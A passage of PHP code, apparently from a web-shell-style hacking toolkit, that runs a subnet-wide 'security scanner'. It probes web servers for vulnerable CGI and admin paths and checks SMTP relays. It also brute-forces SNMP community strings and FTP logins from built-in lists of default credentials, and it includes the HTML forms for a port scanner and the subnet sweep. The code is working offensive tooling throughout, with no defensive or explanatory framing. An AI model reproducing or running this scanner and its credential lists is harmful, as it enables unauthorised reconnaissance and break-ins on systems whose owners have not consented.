$cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
foreach ($file as $v) {
$vuln = array();
$v = trim($v);
if (!$v || $v[0] == '#') {
continue;
}
$v = str_replace('","', '^', $v);
$v = str_replace('"', '', $v);
$vuln = explode('^', $v);
$page = $cqich = $nukech = $adminch = $userch = $vuln[1];
if (strstr($page, '@CGIDIRS')) {
foreach ($cgi as $cg) {
$cqich = str_replace('@CGIDIRS', $cg, $page);
$url = "http://{$ip}{$cqich}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
}
flusheR();
}
} elseif (strstr($page, '@ADMINDIRS')) {
foreach ($admin as $cg) {
$adminch = str_replace('@ADMINDIRS', $cg, $page);
$url = "http://{$ip}{$adminch}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
}
flusheR();
}
} elseif (strstr($page, '@USERS')) {
foreach ($users as $cg) {
$userch = str_replace('@USERS', $cg, $page);
$url = "http://{$ip}{$userch}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
}
flusheR();
}
} elseif (strstr($page, '@NUKE')) {
foreach ($nuke as $cg) {
$nukech = str_replace('@NUKE', $cg, $page);
$url = "http://{$ip}{$nukech}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
}
flusheR();
}
} else {
$url = "http://{$ip}{$page}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
}
flusheR();
}
}
}
}
if (!empty($_REQUEST['smtprelay'])) {
if (checkthisporT($ip, 25, $timeout)) {
$res = '';
$res = checksmtP($ip, $timeout);
if ($res == 1) {
echo "{$ip}) SMTP relay found.<br>";
$output = 1;
}
flusheR();
}
}
if (!empty($_REQUEST['snmpscanner'])) {
if (checkthisporT($ip, 161, $timeout, 1)) {
$com = $_REQUEST['com'];
$coms = $res = "";
if (strstr($com, ",")) {
$c = explode(",", $com);
} else {
$c[0] = $com;
}
foreach ($c as $v) {
$ret = snmpchecK($ip, $v, $timeout);
if ($ret) {
$coms .= " {$v} ";
}
}
if ($coms != "") {
echo "{$ip}) SNMP FOUND: {$coms}<br>";
$output = 1;
}
flusheR();
}
}
if (!empty($_REQUEST['ftpscanner'])) {
if (checkthisporT($ip, 21, $timeout)) {
$usps = explode(',', $_REQUEST['userpass']);
foreach ($usps as $v) {
$user = substr($v, 0, strpos($v, ':'));
$pass = substr($v, strpos($v, ':') + 1);
if ($pass == '[BLANK]') {
$pass = '';
}
$ftp = @ftp_connect($ip, 21, $timeout);
if ($ftp) {
if (@ftp_login($ftp, $user, $pass)) {
$output = 1;
echo "{$ip}) FTP FOUND: ({$user}:{$pass}) <a href=\"ftp://{$ip}\" target=\"_blank\">{$ip}</a> System type: " . ftp_systype($ftp) . "<br>";
}
}
flusheR();
}
}
}
if ($output) {
echo "<hr size=1 noshade>";
}
flusheR();
}
$time = time() - $start;
echo "Done! ({$time} seconds)</font>";
if (!empty($buglist)) {
unlink($buglist);
}
} else {
$chbox = extension_loaded('sockets') ? "<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">{$chbox}</td><td bgcolor=\"#808080\" align=\"right\">{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
$host = substr($host, 0, strrpos($host, "."));
echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH\$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
}
}
